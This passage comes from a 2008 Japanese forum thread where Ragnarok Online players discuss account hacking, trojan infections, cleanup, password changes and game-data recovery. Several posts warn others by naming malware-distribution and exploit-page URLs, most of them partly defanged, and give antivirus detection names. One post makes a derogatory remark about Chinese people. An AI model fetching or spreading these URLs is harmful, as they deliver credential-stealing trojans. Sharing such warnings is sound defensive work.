返事が来るので(英文だけど)、誤検出かどうかわかって安心できます。

>ガンホーへの連絡などは別のPCのほうがいいですよね?
当然です。別PCを使ってください。除去が完了した確証のないPCから、
IDとパスを入力するページを開くなんて危険な行為をやってはいけません。

377 名前:(○口○*)さん:08/07/15 23:41 ID:gs9xqOyc0
>>376
とりあえずVirusTotalを試してみましたが「Backdoor.Win32.Delf.jga」
が表記されたので確実に感染してるとおもいます。
こうなった場合、avastをアンインスコしてカスペの無料アンチウィルスで除去したほうがいいのでしょうか?

378 名前:(○口○*)さん:08/07/15 23:46 ID:ttphBfBH0
OS再インスオススメ

379 名前:(○口○*)さん:08/07/15 23:50 ID:gs9xqOyc0
>>378
OS再インスコした場合ROなどPASS変更済みならば
なんの問題もないと考えていいのでしょうか?
こうゆう事態になったのが初めてなので質問ばかりですいません

380 名前:(○口○*)さん:08/07/16 00:56 ID:BpMHL5bz0
>>379
基本的にYes。

バックアップを取ったデータの中に、トロイやダウンローダが含まれていた場合再感染の危険は残る。

381 名前:(○口○*)さん:08/07/16 04:59 ID:cC4/ddCf0
Win32:Trojan-gen. {Other}が検出されましたと
うちのavast!!君が言うから調べてみたら
avast!!特有の誤検出らしいので
カスペ、バスタースキャン、S&D、でスキャンすると
きれいさっぱり何も検出されないってのは
やっぱうちのavast!!君が頭悪いだけか

何かお勧めない?
avast!!が信用できなくなりました

382 名前:(○口○*)さん:08/07/16 05:01 ID:0ZpMF52S0
>>378
判っていると思うが念のため。
OSを再インストールした後にPASSを変更しないとダメだぞ。

383 名前:(○口○*)さん:08/07/16 08:11 ID:s34t8COB0
おすすめなんてわからんが、うちはカスペ(のサブセット)だな。

384 名前:(○口○*)さん:08/07/16 08:34 ID:mJioLi0l0
>>381
うちではHTTP通信をするDLLでそれが検出される。
作者は誤検出だって言ってるし、実際そうなんだろうけど
それを悪用するアプリもあるかもしれない。
誤検出だと決め付けるのは危険だよ。

385 名前:373:08/07/16 12:22 ID:No5ZcYuUO
携帯から失礼します
。皆様レスありがとうございます。とりあえずOSの再インスコすることにしました。
そして、ウィルス駆除後のpassなどの変更は
RO以外のもの(mixiやニコ動など)も行った方がいいのでしょうか?

386 名前:(○口○*)さん:08/07/16 12:52 ID:s34t8COB0
何抜かれたか分からないので、考えられるモノ(=利用したモノ)は
やっておいたら?セキュリティ向上のためにも。

387 名前:(○口○*)さん:08/07/16 12:53 ID:BpMHL5bz0
>>385
感染後にパスワード入力(クッキーなどに保存していて自動ログインであっても)してから
閲覧していた場合は、パス変更がお勧めです。

いつ踏んだものかわからない場合は、自己責任で判断して下さい。

踏んだ後に、1度もログイン・閲覧を行なっていない場合、パスを変更する必要はありません。

388 名前:(○口○*)さん:08/07/16 15:08 ID:c339DK7H0
>>385
パスワードローテーションの観点からは、変更することが望ましいといえる。
仮に、それら全てで共通のパスワードを用いているならば、出来れば有料と無料のサービスでは別々のパスワードを用意した方が無難。
mixiやnicovideoへの認証はメールアドレスを用いている為、安全弁がパスワードだけしか存在しないから。

389 名前:(○口○*)さん:08/07/17 01:23 ID:4oHDNR4H0
OfficeのSnapshotViewerの脆弱性を使うスクリプト。
kk■jackkk■cn/office.htm
→ dd■jackkk■cn/a.exe

あまりに単純なスクリプトでお茶噴いた。

390 名前:(○口○*)さん:08/07/17 01:46 ID:4oHDNR4H0
Firefox3.0.1リリース
Firefox2.0.0.16リリース

391 名前:(○口○*)さん:08/07/17 01:57 ID:uQT56Mlz0
早漏乙、正式に落とせるようになってからリリースっていえな

392 名前:(○口○*)さん:08/07/17 02:10 ID:Px5hoRsz0
Firefox2.0.0.16はアップデートできるけど、Firefox3.0.1はまだ無理だな

たぶんFirefox3.0.1は昼頃かなー

393 名前:(○口○*)さん:08/07/17 07:26 ID:mc2CMNTD0
別スレで質問させて頂いたのですが、こちらに誘導して頂きましたので
再度質問させてください。

先日垢ハクに遭い倉庫がカラになっていたのですが、
警察への報告はなくしたアイテムなども事細かに書けと言われたので
倉庫にあったと思わしきものを出来る限り書き出して提出しました。

救済措置が取られる場合、あちらにはゲーム内のログが詳細に残っていたりして
( /savechatした時みたいに 〇〇1個獲得みたいな)
そういうものと照会して取られたと確認出来ればそのアイテムは戻ってくるの
でしょうか?
それとも、そんなログは残らっておらず、確認出来ないという事で戻ってはこないのでしょうか?

お分かりの方がいましたら教えて頂けませんでしょうか。よろしくお願いします。

394 名前:(○口○*)さん:08/07/17 09:14 ID:AcCWZO4S0
分からんけれど、期待はしない方がいいよ。
ゲーム内資産に金銭的価値は認められないし、窃盗罪にも問えない。

395 名前:(○口○*)さん:08/07/17 10:43 ID:pC/alNKM0
不正アクセスでタイーホはできるかもしれないけど戻ってくるとは限らないって事かな?

396 名前:(○口○*)さん:08/07/17 11:31 ID:uQT56Mlz0
逮捕こそ出来んよ…

397 名前:(○口○*)さん:08/07/17 11:56 ID:eQggwgXq0
>>ゲーム内資産に金銭的価値は認められないし、窃盗罪にも問えない。
裁判の実績的には存在するはず、もちろんその逆で

398 名前:(○口○*)さん:08/07/17 12:02 ID:Y4VrHlMP0
>>397
それは課金アイテムに関してだろ。現実の金と結び付きが実証できるものに関しては別。
ただの電子データに関しては、価値を保証する法律は整備されてない。

399 名前:(○口○*)さん:08/07/17 12:17 ID:uQT56Mlz0
とりあえず話ずれてきてるからここいらで終わっとこうぜ

400 名前:(○口○*)さん:08/07/17 12:19 ID:Y4VrHlMP0
だな。

401 名前:(○口○*)さん:08/07/17 13:14 ID:AcCWZO4S0
>>395
そこまでやるかは運営次第で、やってくれなかったら民事訴訟しか
ないんだけれど、こちらもそこまでやるかって話なのだ。

402 名前:(○口○*)さん:08/07/17 15:19 ID:pC/alNKM0
そもそも大半の実行犯は中華でしょっぴけなさそうだしな

403 名前:393:08/07/17 15:35 ID:mc2CMNTD0
皆さんレスありがとうございます。
戻ってこないものと認識していた方がよさそうですね。
また一からやり直すつもりでがんばります。

404 名前:(○口○*)さん:08/07/17 15:48 ID:pC/alNKM0
可能性はゼロじゃないし、経路もわかるかもしれないから(再発防止)
できる範囲でアクション起こしたほうがいいかも

405 名前:(○口○*)さん:08/07/17 16:10 ID:QbGsqOjA0
金銭的価値があるかとか逮捕できるかとかでベクトルがずれて
393の質問に答えてないじゃないか。
>>2の臨時まとめさんに救済された例がまとめてある。
泣き寝入りせずにがんばれ。

406 名前:(○口○*)さん:08/07/17 16:42 ID:uhxp2RPA0
11ヶ月前にハックされた者なのですが、ようやく警察から連絡が。
心配なのは11ヶ月前となると当時のデータは残っていなくて復旧は不可能なのではないかということ。
データが復旧された方の体験記を読むと、たいてい半年以内なんですが、半年以上経っても復旧された例をご存知の方いらっしゃいますか?

407 名前:(○口○*)さん:08/07/17 18:15 ID:TrUySGeX0
>>369の罠ドメイン、livedoormにトロイが置かれた。
中国のフォーラムに福建中華:cvooe自らがリネ向けトロイとして記事を書いている模様。
livedoormでぐぐるとcvooeの記事とそのフォーラムが見つかる。

拾ってきたものをVirSCAN.orgにかけてみると…。(魚拓)
ttp://s01.megalodon.jp/2008-0717-1809-02/www.virscan.org/report/8c1bb83dcbed0efad4a2935ff206231a.html

気をつけてくれよな!

408 名前:(○口○*)さん:08/07/17 18:44 ID:pC/alNKM0
>>406
癌次第?

409 名前:(○口○*)さん:08/07/17 19:52 ID:7KPS2oLg0
癌に報告すれば分かると思うけど。
不正アクセス禁止法の被害にあったという証拠があればデータ復旧してくれるとの事。

-----------
ゲームデータの復旧に関しては
警察機関による捜査が完了した時点にておこなっております。

ご投稿いただきました件につきまして、ご相談いただきました
警察機関にて現在も捜査中であるため、
ゲームデータの復旧をおこなうことができません。
何とぞご了承いただきますようお願いいたします。

なお、アカウントハッキングであるという事実が確認され、
捜査が完了した際には、再度運営チームまで
ご連絡いただきますようお願いいたします。
-----------

俺も今調査中で早く調査が終わらないかとwktkしているんだ。

410 名前:(○口○*)さん:08/07/17 21:15 ID:uhxp2RPA0
>>409
問題なのは、11ヶ月も前のデータを保存しているんですかね・・・。
不正アクセスがあったという事実は突き止めたものの、さすがに11ヶ月前のデータを復元出来るかどうか。

411 名前:(○口○*)さん:08/07/17 21:33 ID:JyxGbJQL0
>>410
データ復旧に警察判断が必要でも、復旧に必要なバックアップの保全を
すること自体は警察が動く前でも可能なわけで、おまえさんが
11ヶ月前にちゃんと癌へ働きかけをしたなら残ってる可能性はある。

ただ正直なところ、なんで11ヶ月も経った今になって警察が動くのかが
わからないとなんとも言えない。
前例作る意義もあるからがんばれ。

412 名前:まとめ臨時 ◆kJfhJwdLoM:08/07/18 04:42 ID:el2S9DQV0
最近罠サイトの転送先が数時間後には
別の所に置き換わっているということが頻繁?にあるようです。
もちろん前から危険ドメインが停止扱いになったりで
使えなくなったので切り替えたというのはよくある話だと思うのですが…

お世話になっているFFXI(仮)さんのサイトの階層分析
52-o■cn/admin■js
+www■pang357■cn/e2■htm
 +user1■web285■com■cn/news■html

数時間後-------
52-o■cn/admin■js
+www■pang357■cn/e2■htm
+www■pang951■cn/ghost■html

で、たまたまさっきチェックしたときに下の357が切り替わってた。
www■pang357■cn/e2■htm
+js■users■51■la/1937313■js
+www■sony123■com■cn/ghost■html


pang357に切り替わったのはpang951が使えなくなって差し替えたわけでなく
pang951自体は現存している模様。
時間単位で罠サイトの内容を書き換えるようなプログラムでも使ってる…?
とか妄想してみたけど実際どうなんでしょうね。

とりあえず罠サイトの中の人必死だなって思う。

413 名前:まとめ臨時 ◆kJfhJwdLoM:08/07/18 04:47 ID:el2S9DQV0
半角スペースが削れてた…。全角スペースでないと駄目なんですね。
二段目は
52-o
+357
 +951
です。スレ消費ですみません。

414 名前:(○口○*)さん:08/07/18 17:30 ID:Ua1mdD9g0
トロイの木馬を踏み台にしたSQLインジェクション攻撃が増加
ttp://internet.watch.impress.co.jp/cda/news/2008/07/18/20313.html
> この攻撃は、ユーザーのPCに仕掛けたトロイの木馬「TROJ_ASPROX」をプロキシサーバーとして利用することで、
>Webアプリケーションを標的としたSQLインジェクション攻撃を行い、不正なWebサイトへのアクセスを誘導するIFRAMEタグを埋め込むというもの。

この間のPangYa公式改竄もこの類いかも知れないが、botnet的な使われ方が再び活発になってきた。
被害者が、次の瞬間には加害者に転じてしまう。

セキュリティソフトの検疫のように、感染ユーザーの接続を一時的にISPから切り離す仕組みが必要かも。
接続先はフレッツ・スクエアのような隔離ネットワークに限定され、その中にDMZの要領でWUやセキュリティソフトへのサポートを行う感じ。

415 名前:(○口○*)さん:08/07/18 18:07 ID:kMs8Yetr0
>>414
そういうのあればいいねえ。
それを妨害するマルウェアも出てくるでしょうが。

とりあえず、外部からの接続を防ぐためのルーターは挟めておきたい。

416 名前:(○口○*)さん:08/07/18 20:55 ID:4ScR5NOj0
>>412
adw95系( >>414 asprox)みたいな動的切り替えは
やってない気がします。たぶんアナクロな手法でしこしこと。

417 名前:(○口○*)さん:08/07/19 19:41 ID:8Dh2MRq20
blog■livedoor■jp/fvidkl/
-> www■livedoorm■com/woodem■htm
--> www■gaimima130■com/2■exe

ttp://www.virustotal.com/jp/analisis/068e581692007413e16f33c2fe63f6d5

livedoormも稼働し始めたね。
折角なので、typo狙いのかどでlivedoorにドメインごと通報してみた。

418 名前:(○口○*)さん:08/07/19 23:06 ID:GNjT+H010
>>417
woodem.htmはカスペスルー。

http://www.virustotal.com/analisis/664edfad076b999bd50ac24fdbefce7e

woodem.htm : Exploit:HTML/MS06014 , JS/MS06-014!exploit , JS/AdoExpl.A!Camelot
2.exe : Backdoor.Win32.PcClient.gbc

419 名前:(○口○*)さん:08/07/20 09:45 ID:PzxOPE480
情報提供です。

http://www■testinghua■com/Wiki/ragnarok/v=UIb2Jdte1jU■zip

mixiのRO関連コミュニティに、上記アドレスを書き込んだ不審なトピを立てまくってる奴がいる模様です。
(BS Wikiの危険ドメインと一致していたので危険と判断、運営事務局には通報済み)
mixiでRO関連の活動をされている方はご注意ください。

420 名前:(○口○*)さん:08/07/20 10:25 ID:3a2ScYx40
kovieによる日本サイト攻撃も確認。
kovieをGoogleの日本語ページで検索すると、ネカフェの掲示板にその痕跡あり。
これもまたテンプレ文、末尾にウィルスと。
【検索結果2ページ目】
1 kovie さん 08/07/19 20:41 UID:[ 60886@FJFCF ] [ 返信 / 引用 ] [ 終了 / 編集 / 削除 ].
世界最強のエロ動画データベース 8万タイトル以上 ★yourfilehostからダウンロードできます!★
hxxp://www■livedoorm■com/blog■htm ...

気をつけてくれよな!

421 名前:(○口○*)さん:08/07/21 11:51 ID:C8xeomJa0
【      気付いた日時          】 7月20日午前8時
【不審なアドレスのクリックの有無 】 (?)
【他人にID/Passを教えた事の有無】 (No)
【他人が貴方のPCを使う可能性の有無】 (No)
【    ツールの使用の有無      】 (No)
【  ネットカフェの利用の有無    】 (No)
【     OS    】 (XP HomeEdition SP2)
【使用ブラウザ 】 (スレイプニール)
【WindowsUpdateの有無】 (今年6月末か7月頭くらい)
【 アンチウイルスソフト 】 (?)
【その他のSecurty対策 】 (?)
【 ウイルススキャン結果】 (カスペルスキースキャンでトロイ発見)
【スレログやテンプレを読んだか】 (軽く目を通した)
【hosts変更】(?)
【PeerGuardian2導入】(?)
【説明】 倉庫の装備とメインキャラの装備資金が根こそぎ消えていました

カスペルスキーでトロイを発見、削除したのですが
この状態でROのアカウント設定を変える等の行動は起こすのは安全でしょうか
またプロダクトリカバリーの効果はいかほどでしょうか

422 名前:(○口○*)さん:08/07/21 11:59 ID:OVYH0V1I0
シマンテック、「ノートン2009」日本語ベータ版を無償公開
http://internet.watch.impress.co.jp/cda/news/2008/07/18/20308.html

パターンの反応が速ければなぁ…

423 名前:(○口○*)さん:08/07/21 12:02 ID:OVYH0V1I0
>>421
>【説明】 倉庫の装備とメインキャラの装備資金が根こそぎ消えていました
垢ハックなむ

>カスペルスキーでトロイを発見、削除したのですが
>この状態でROのアカウント設定を変える等の行動は起こすのは安全でしょうか
他に何かが残っている可能性もある。安全と保証はできない。
設定を変えるのであれば、安全な環境を用意する(1CD linuxなど)ことを推奨する。

>またプロダクトリカバリーの効果はいかほどでしょうか
リカバリー=安全な環境

それより、(もう取られるもの無いんだし)癌と警察への報告を早急に行なえ!

424 名前:421:08/07/21 14:14 ID:C8xeomJa0
幸運なことに被害は資産の1割程で済みました
そのため(まだ捕られるものがあるため)癌へのログインができない状況です

データのバックアップを取りプロダクトリカバリーを行い
各種再設定を行いたいと思います

423さんありがとうございました

425 名前:(○口○*)さん:08/07/21 16:52 ID:OVYH0V1I0
LiveROに立ったアカハックスレ

|1 (○口○*)さん 08/07/21 16:43 ID:glsBfpkZ0
|今週は遊びで同盟内紅白戦をやってました。 いつもたいていWP付近でロキだけだったので、たまにはエンペ付近に行くのもいいですね。

http://www■game689■com/rmvb■exe

Trojan-PSW.Win32.Mapler.ae

http://www.virustotal.com/analisis/b30a2d2f054ca67f1fc4098050913783

426 名前:(○口○*)さん:08/07/21 16:53 ID:OVYH0V1I0
>>424
1CD Linuxとかで早急にパス変えとけ。さもないとリカバリ作業してる間に残りももっていかれるかもしれないぞ。

427 名前:(○口○*)さん:08/07/21 17:31 ID:OVYH0V1I0
>>425
|4 L ★ sage New! 08/07/21 16:51 ID:???0
|OFSfb-18p2-25*.ppp11.odn.ad.jp

|7 L ★ sage 08/07/21 16:55 ID:???0
|2時間後スレを削除します。

428 名前:(○口○*)さん:08/07/21 18:00 ID:7Nju+0tN0
>>425
Maplerか…これの原種はMapleStoryトロイっぽいね

429 名前:(○口○*)さん:08/07/21 18:03 ID:rTxpfCM00
またOFSオデンか

そのホストは無条件に永久アク禁でも誰も困らないだろ

430 名前:(○口○*)さん:08/07/21 18:51 ID:+DpP3igH0
ODNの当該は、2chでも5度くらいの再発規制を繰り返して呆れられているし、ROでも職Wiki方面では既に見放されているよ。
所詮は禿テレコムだし、巻き込まれ被害者はISPを乗り換えた方が賢明。

431 名前:(○口○*)さん:08/07/21 22:12 ID:rBFKhVFe0
さきほど、カスペルスキーオンラインで検出をかけたら
午後のこーだのインストーラーにトロイの検出がでました。検体名は
「Trojan-Dropper.Win32.Agent.uhz 」
ウイルス辞典などにも記述はのってなく、どんなものなのか詳細は不明
カスペスレでは、誤検出として取り扱われていました。
で、そのあとインストーラーを削除したんですが、カスペで再び検出すると以下のものが

C:\System Volume Information\_restore{82D310DE-1BB8-4FF6-A3EA-FE19A694DC23}\RP32\A0008840.exe/compile/bin/nasmw.exe
C:\System Volume Information\_restore{82D310DE-1BB8-4FF6-A3EA-FE19A694DC23}\RP32\A0008840.exe
C:\System Volume Information\_restore{82D310DE-1BB8-4FF6-A3EA-FE19A694DC23}\RP32\A0008841.exe/compile/bin/nasmw.exe
C:\System Volume Information\_restore{82D310DE-1BB8-4FF6-A3EA-FE19A694DC23}\RP32\A0008841.exe

おそらくシステムの復元ポイントで作られたコーダのインストーラに反応してるっぽいのですが、
詳細がよくわかりません。どなたかわかる方ご教授いただければと思います。
よろしくお願いします。

432 名前:(○口○*)さん:08/07/21 22:40 ID:OVYH0V1I0
>>431
nasmw.exeを検知してるようですね。(インストーラ付きだと、コンパイルする為に内蔵してる)
このTrojan-Dropper.Win32.Agent.uhzは、誤検出と思われますので、カスペに検体提出しときます。

433 名前:(○口○*)さん:08/07/21 22:53 ID:OVYH0V1I0
>>431
検体提出しつつ、パターン更新したら検出しなくなっていました。(カスペの担当者さん、よけいな仕事増やしてごめん)
定義の更新をお勧めします。

434 名前:(○口○*)さん:08/07/22 10:20 ID:mOjk87L/0
>>433
GJすぎる

435 名前:(○口○*)さん:08/07/22 12:57 ID:RX31tSpu0
仕事はやいんだなw

436 名前:(○口○*)さん:08/07/22 13:24 ID:u6jw3w4Q0
福建中華の罠したらば誕生。

"Ragnarok Fenrir板"
ttp://jbbs■livedoor■jp/computer/39711/

見ておかしいと直ぐに気づくはず。
スレが2つのみ、それぞれ記事数は1しかないうえ、一つはハック。
こういうタイプだとライブドアなかなか動かないんだよなぁ。

気をつけてくれよな!

437 名前:(○口○*)さん:08/07/22 13:57 ID:u6jw3w4Q0
436のやつ過去スレにも出てるのか、2月ごろに
でも今のとは状況が異なるね。
過去スレで2/16ー18にあったという管理者投稿が綺麗に消えている、今現在の投稿は7/20ー21の2つだけだ。
時々で中身を入れ替えるタイプだと思われ。
よって”computer/39711/”はNGワードでも構わないと思う。

438 名前:(○口○*)さん:08/07/22 13:59 ID:XIhY5BsQ0
できることは何でもやっちゃう、か。
人件費がタダみたいな国は、人間を奴隷のように働かせるんだからすごいや。

439 名前:(○口○*)さん:08/07/22 19:42 ID:hciaLu7X0
今更だが復旧の体験談とか需要ある?

440 名前:(○口○*)さん:08/07/22 19:44 ID:VpRunD6K0
こっちだとログ残らないから(保存してるサイトなら別)
長くなるようならまとめサイトを立ててくれると嬉しいかもしれない

441 名前:(○口○*)さん:08/07/22 20:26 ID:zmgt25Ms0
>>439
投下希望

>>440
それこそ、Wikiかまとめサイトに転記すれば済む話。

442 名前:(○口○*)さん:08/07/22 20:31 ID:Qk1NLe2k0
そうそう。

せっかく書いてくれるんだから、形態は問わないよ。
必要に応じてまとめたり転載したりはさせてもらうけど。

443 名前:431:08/07/22 23:24 ID:fb7q4MCh0
>>433
うは、対応までしてくださったみたいでありがとうございます。
ご迷惑おかけしました

444 名前:(○口○*)さん:08/07/23 00:09 ID:xazTC+tH0
CNETより

通信傍受するARPスプーフィングによる被害が増加--アンラボがレポート
ttp://japan.cnet.com/marketing/story/0,3800080523,20377488,00.htm

>6月のトップ10にランクインした悪性コードを見ると、4月や5月に大部分を
>占めていたオンラインゲーム関連のトロイの木馬が、7位と9位に登場した
>のみとなった。
>悪性コード製作者の関心が、単純にオンラインゲーム関連のトロイの木馬を
>制作することから、ドロッパーやダウンローダーなどを利用したオンラインゲーム
>関連のトロイの木馬の配布に移っているためであると分析している。

>このようなARPスプーフィング攻撃も、オンラインゲーム関連のトロイの木馬を
>インストールすることが最終的な目的になっているタイプがほとんど。

445 名前:(○口○*)さん:08/07/23 00:12 ID:xazTC+tH0
もう1つCNETより。
こっちの方が問題……

オーディオファイルに感染する初のワーム、カスペルスキーが検知
ttp://japan.cnet.com/news/sec/story/0,2000056024,20377521,00.htm

>しかし、今回のワームはオーディオファイルそのものに感染しており、
>Kaspersky Labのウイルスアナリストによると前例がないという。

>Kaspersky Labでは、ユーザーのほとんどは自分のオーディオファイルが
>感染するとは考えていないため、攻撃が成功する可能性は高いと予測している。
>また、偽ウェブページ上のファイルにはInter Technologies社の電子署名が
>付与されており、www.usertrust.comによって信頼できるページと認められて
>いることに注目している。

446 名前:(○口○*)さん:08/07/23 00:18 ID:vFuDhpDF0
なんかウイルスというより、いつものようにファイル形式決めうちの処理を
しているのが原因っぽい感じが

メディアプレーヤー以外で再生した場合は何も起きないんじゃないかな?

447 名前:(○口○*)さん:08/07/23 00:24 ID:fuIAFJC30
>>445
カスペも同じニュースを自サイトで出してますね。

Kaspersky Lab、オーディオファイルに感染する新種ワームを検知
http://www.kaspersky.co.jp/news?id=207578680

MP3ファイルに取り付いて、拡張子そのままで、WMA形式に変換し、トロイとして動作させるらしい。
一種の拡張子偽装だねぇ。

448 名前:439:08/07/23 03:49 ID:tGUdEoZn0
>>440 >>441 >>442

>>439です
すみませんが
まだ約束を取り付けたところまでだけなんで完全に復旧完了したら投下します

449 名前:(○口○*)さん:08/07/23 04:31 ID:XePG6JRI0
>>436 のやつ行ってみた。
スレ一個しか無かった。
ハックのは無かったみたい。

450 名前:(○口○*)さん:08/07/23 10:12 ID:j70Rni8v0
>>449
一応したらばタイプの正式な削除依頼出しておいたからな。

>ハックのは無かったみたい。
やはり完全に中華の板と化している模様だな。
中華は自分の板に他人に書き込みされるとスレごと消すぞ。
中華が自分で消したな、次に罠書くときは自分で書いたら即1文字規制になっているはず。
1文字でも文字数が多すぎますってやつだ。
以前の罠カキコなんかもそうだった。

他所で書いたが436のしたらばの6月時点のキャッシュと今のは掲示板スタイルも違うのでひょっとすると、と言う不安もある。
掲示板タイトル部分、どうみても2ちゃんの○○板のところのパクリ

キャッシュのは透明削除せずちゃんと警告の上削除していた事を考えると6月時点の管理者がやったものとは考えにくい。
つまり…。

気をつけてくれよな!

451 名前:(○口○*)さん:08/07/23 11:40 ID:j70Rni8v0
>>436に続いておかしなものを見つけた。
ttp://jbbs.livedoor.jp/computer/27417/
スレの流れからこの板は2006年1月ごろに作られた"仮面ライダーもの"の掲示板であるようだ。

なのにタイトルは"Ragnarok...."
436と同様に2ちゃんの○○板のところをパクっている。

明らかに不自然、直接リンクじゃないのが救いだが
やはりこれは…、と勘ぐりたくもなる。

452 名前:(○口○*)さん:08/07/23 14:36 ID:fuIAFJC30
>>451
見てみた…すげーな。

明らかなアカハックと、アダルト業者のspamだらけだw

453 名前:(○口○*)さん:08/07/23 15:40 ID:31CZ2k+10
DNS脆弱性の詳報が手違いで流出
http://www.itmedia.co.jp/news/articles/0807/23/news031.html

ま、まあ…気をつけてね。

454 名前:(○口○*)さん:08/07/23 23:22 ID:N8tZpIH3O
今日ネカフェ○○空間行って、経験値ウマーしながら
バック作業でカスペってたんだが、帰る時結果見たら1件…。

Backdoor.Win32.Rbot.rdxと表示されてました。
自宅帰ったら即パス変更するつもりでしたので
そこまで焦りはないですがやはりカスペで何か引っ掛かると驚きますね。

ネカフェは怖い(´・ω・`)

455 名前:(○口○*)さん:08/07/23 23:42 ID:xazTC+tH0
当然、店員にはそれ伝えたんだよな?

>自宅帰ったら即パス変更するつもりでしたので
>そこまで焦りはないですがやはりカスペで何か引っ掛かると驚きますね。

過去にハク犯とリアルタイムでログイン合戦をやった人も居る。
ネカフェ出てから自宅までどれぐらい掛かるか知らんが、その時間が
致命傷になる場合もありえるわけで、もうちょっと焦った方がいいと思う。


しかしバックドアが仕込まれてるネカフェってどうなのよ……

456 名前:(○口○*)さん:08/07/24 00:18 ID:bYDtp8fZ0
ネットカフェが流行りだした昔は良くあったと思うけど

457 名前:454:08/07/24 01:04 ID:SS3h/Z7jO
クリーンなPCよりパス変更完了!
結果はセーフでしたが、まさかバックドア?がやばいもんとは(´・ω・`)

ネカフェでググっても英語サイト2件しかひっかからなかったしで
安心しきってました。

店員には言わないですぐ退店しちゃいましたよ。

バックドアとはやばいんですかね?

458 名前:(○口○*)さん:08/07/24 01:12 ID:B0zmNM5O0
やばいです

459 名前:(○口○*)さん:08/07/24 02:22 ID:s7PDxOBi0
>>454,457
多分このタイプ、ないしは亜種だと思われ。
ttp://www.f-secure.co.jp/v-descs/v-descs3/rbot.htm

IRCbot系バックドアが仕込まれている時点で、そのPCでの操作内容は悪意ある第三者に筒抜けだと思ったほうが良い。
できる事なら、FC本部宛にクレームを投げたほうが良い。レシートに利用席番が残っていれば、それも添えれば確実。
ttp://www.runsystem.co.jp/inqu-etc.html

460 名前:(○口○*)さん:08/07/24 02:30 ID:5uHfnZ+50
>>457
チェーン店なら本社にクレーム入れとけ。
もし故意なら悪質だからな。

461 名前:(○口○*)さん:08/07/24 02:31 ID:SS3h/Z7jO
(´・ω・`)ひどい店に行ってしまった。

会社から近いから寄ったのにもう2度と行かないよ。

クレーム送れば何か詫び来ますかね?席番は覚えてます。

462 名前:(○口○*)さん:08/07/24 02:44 ID:B0zmNM5O0
詫びのチケットとか期待してるんなら諦めろ。

だが、次に使う奴の安全の為、次に自分が使う時の安全の為、報告だけは出しておけ。
放置する事は、不特定多数が、意図せぬ加害者になることを見過ごしてることになる。

463 名前:(○口○*)さん:08/07/24 02:47 ID:ZsjZu1UJ0
とりあえずどこか明記しておいても問題ないんじゃない?店名

464 名前:(○口○*)さん:08/07/24 02:59 ID:SS3h/Z7jO
時遊空間です

本社にクレーム入れておきますね

465 名前:(○口○*)さん:08/07/24 08:02 ID:iMnQezdY0
それは会社名な
店名てのは○○店、ってほう

466 名前:(○口○*)さん:08/07/24 09:34 ID:xsjPWWsL0
あそこ危ないのかよ…
今度から最低でもカスペオンラインスキャンかけてから使った方がいいね

467 名前:(○口○*)さん:08/07/24 09:42 ID:HlFsIU5F0
ネカフェはスキャンしてから使うのが常識だろ・・・・。
店員含め誰が触ったかわからないんだからな。
会社名が出たからといってその他が安全な保証は一切無い。
どこの会社だから危ない、とかじゃなく全部に危険があると思ってた方がいい。

468 名前:(○口○*)さん:08/07/24 11:17 ID:KKaqu+Ut0
この前アプレシオでもバックドア入ってたよ。
ネカフェでPC触るならスキャンは必要だね。

469 名前:(○口○*)さん:08/07/24 12:23 ID:1YSGeOM+O
アプレシオの初期化ソフトは優秀な方だし、基本的に会員制な上にNODも入ってるからかなり安心出来る…と思ってたんだがなあ。

470 名前:(○口○*)さん:08/07/24 15:25 ID:GHgSKXIC0
>>469
アプレシオは店にもよる
アプレシオって意外なことにFCが多いんだけど
直営・有力FC意外は注意した方がいい

iLOVE遊(だったかな?)の時代からFCやってるお店を利用してるけど
そこでもスタッフが居るフロア以外は極力利用しないようにしている

喫煙フロア(ダートやビリヤードと同じフロア)でフロントとは別の階の店があるけど
喫煙フロアのネトゲ席にUSB刺さってたのを見たことがある。
禁煙フロアはフロントに近いことも有って5席しかないけど基本ここを利用している

※新宿ハイジアは中国人が断られたのを見たことがある

471 名前:(○口○*)さん:08/07/24 17:31 ID:Tz1Ji60s0
mixiの一部コミュニティで

(RO)HiMEがLOD様をおいかけた
えっちてぃーてぃぴー://mx.ynjsj.コム/douga/stream/40354611815368.wmv.zip

ってトピックが立ってる。URLは変更してある。
DLしてみると、拡張子はzipだけど実際はRAR書庫で、中に入ってるのも
34sd6rtey6.wmv.exeって言うあからさまに怪しい実効ファイル。

ttp://www.virustotal.com/jp/analisis/254a771147a31db6f1a91ef0ccaac1aa

バカフィーやノートンでは検出できないみたいなので注意

472 名前:(○口○*)さん:08/07/24 18:00 ID:xsjPWWsL0
>>471
カスペさんで見てみたら重複感染(2つ)
Backdoor.Win32.Agent.lzi
Trojan.Win32.Inject.dzc

473 名前:(○口○*)さん:08/07/24 18:24 ID:VkWZDGE20
それexe2匹をcab自己解凍で圧縮した上でUpackかけた奴だから
2匹捕獲できるのが正解。
VTとかではそゆの無理なのでバラせればいいんだけど…。

474 名前:(○口○*)さん:08/07/24 18:26 ID:VkWZDGE20
あと一昨日あたりからRLPackを使うのが増えてきた。

475 名前:(○口○*)さん:08/07/24 20:12 ID:bmXRSAoQ0
>>454
おれもネカフェでカスペルのオンラインスキャンかけたら
そんな感じのが引っかかったよ
調べようとしたけどウイルス辞典(?)などには該当無く
AVGを落としてスキャンしてみたけど
何も見つからなかったから誤検出かと思った

帰ってから一応PASSの変更はしたけどね

明日行ってみるつもりだから
同じ席にはならないだろうけど
もう一度カスペルでスキャンしてみるよ

476 名前:(○口○*)さん:08/07/24 23:26 ID:G6L/4T/u0
転載だけど貼っていきますね。このヒトはクレームいれたのかな?

107 名前:(○口○*)さん[sage] 投稿日:08/07/24(木) 18:08 ID:khfaz7W70
1.5倍期間だし、待ち合わせ時間まですこし遊ぼうとネカフェに寄ったサボリーマンの俺。

利用店舗:ルシェルシェ高田馬場店(東京都)
利用席(ハイスペック・喫煙・オープン等):個室喫煙席
利用料金プラン:通常
キャンペーン(対象か):対象っぽい
PCスペック(CPU・メモリ容量・VGA等):不明
インストール・パッチ状況:最新
セキュリティ(環境復元ソフトの種別等):なし
ウィルススキャン結果:http://www.mmobbs.com/uploader/files/5254.png
ドリンク・アイス等:種類少なめ(無料)
食事:利用してない
分煙状況:喫煙BOX席・禁煙半オープン席(カーテンにて区切り)
備考: マウスカーソルが飛ぶ飛ぶ。
   …パックにしないでほんっとうによかった

477 名前:(○口○*)さん:08/07/24 23:42 ID:ZsjZu1UJ0
それをここで何を話し合えと…?

478 名前:(○口○*)さん:08/07/24 23:51 ID:bYDtp8fZ0
ウイルス感染数No.1店舗を決めるんだな

